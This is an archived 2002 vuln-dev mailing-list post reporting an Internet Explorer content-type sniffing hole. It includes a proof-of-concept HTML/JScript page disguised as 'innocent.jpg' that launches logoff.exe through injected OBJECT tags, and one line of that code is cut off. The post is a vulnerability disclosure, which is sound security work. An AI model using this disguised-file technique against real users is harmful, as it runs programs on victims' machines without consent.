Rather large MSIE-hole

From: Magnus Bodin (magnus@bodin.org)
Date: 03/12/02

• Previous message: Gushterul: "Re: compress(vul) + ftpd(?)"
• Next in thread: Jon Zobrist: "Re: Rather large MSIE-hole"
• Reply: Jon Zobrist: "Re: Rather large MSIE-hole"
• Reply: foo BAR: "Re: Rather large MSIE-hole"
• Reply: Suresh P: "Disabling the MSIE hole."
• Reply: Magnus Bodin: "Re: Rather large MSIE-hole"
• Reply: Jim Harrison (SPG): "RE: Rather large MSIE-hole"
• Reply: Maarten Oosterink: "RE: Rather large MSIE-hole"
• Reply: Slow2Show: "Re: Rather large MSIE-hole"
• Reply: Eric V Brown: "Re: Rather large MSIE-hole"
• Reply: Wall, Kevin: "RE: Rather large MSIE-hole"
• Reply: Paul D. Campbell: "Re: Rather large MSIE-hole"
• Reply: Slow2Show: "Re: Rather large MSIE-hole"
• Reply: Slow2Show: "Re: Rather large MSIE-hole"
• Reply: John Swensson: "RE: Rather large MSIE-hole"
• Reply: The Blueberry: "Re: Rather large MSIE-hole"
• Reply: Keith Tyler: "RE: Rather large MSIE-hole"
• Reply: Slow2Show: "Re: Rather large MSIE-hole"
• Reply: NoCoNFLiC: "FW: [Re: Rather large MSIE-hole] another variant"
• Reply: Tiago Halm: "RE: Rather large MSIE-hole"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

---

Date: Tue, 12 Mar 2002 11:32:20 +0100
From: Magnus Bodin <magnus@bodin.org>
To: vuln-dev@securityfocus.com

The latest MSIE-hole is now spreading.

THE ATTACHED HTML-code is served as a jpeg-file, and as MSIE ignores the
Content-Type if it "thinks" it knows better, then the code is executed.
This in combination with the malicious code that is possible to run, then
an "innocent.jpg" with the following content will log off an XP-user.

--%< cut here-----
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML>
<HEAD>
<TITLE>IE6 security...</TITLE>

<META http-equiv=Content-Type content="text/html; charset=windows-1252">
<SCRIPT language=JScript>

var programName=new Array(
    'c:/windows/system32/logoff.exe',
    'c:/winxp/system32/logoff.exe',
    'c:/winnt/system32/logoff.exe'
);

function Init(){
    var oPopup=window.createPopup();
    var oPopBody=oPopup.document.body;
    var n,html='';
    for(n=0;n<programName.length;n++)
        html+="<OBJECT NAME='X'
CLASSID='CLSID:11111111-1111-1111-1111-111111111111' C
    oPopBody.innerHTML=html;
    oPopup.show(290, 390, 200, 200, document.body);
}

</SCRIPT>
</head>
<BODY onload="Init()">
You should feel lucky if you dont have XP right now.
</BODY>
</HTML>
--%< cut here-----

-- 
magnus                               MICROS~1 BOB was written in Lisp.         
            http://x42.com/                          

---

• Previous message: Gushterul: "Re: compress(vul) + ftpd(?)"
• Next in thread: Jon Zobrist: "Re: Rather large MSIE-hole"
• Reply: Jon Zobrist: "Re: Rather large MSIE-hole"
• Reply: foo BAR: "Re: Rather large MSIE-hole"
• Reply: Suresh P: "Disabling the MSIE hole."
• Reply: Magnus Bodin: "Re: Rather large MSIE-hole"
• Reply: Jim Harrison (SPG): "RE: Rather large MSIE-hole"
• Reply: Maarten Oosterink: "RE: Rather large MSIE-hole"
• Reply: Slow2Show: "Re: Rather large MSIE-hole"
• Reply: Eric V Brown: "Re: Rather large MSIE-hole"
• Reply: Wall, Kevin: "RE: Rather large MSIE-hole"
• Reply: Paul D. Campbell: "Re: Rather large MSIE-hole"
• Reply: Slow2Show: "Re: Rather large MSIE-hole"
• Reply: Slow2Show: "Re: Rather large MSIE-hole"
• Reply: John Swensson: "RE: Rather large MSIE-hole"
• Reply: The Blueberry: "Re: Rather large MSIE-hole"
• Reply: Keith Tyler: "RE: Rather large MSIE-hole"
• Reply: Slow2Show: "Re: Rather large MSIE-hole"
• Reply: NoCoNFLiC: "FW: [Re: Rather large MSIE-hole] another variant"
• Reply: Tiago Halm: "RE: Rather large MSIE-hole"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

We are proud to have Web Hosting and Rack Housing from 9 Net Avenue Deutschland.
(11)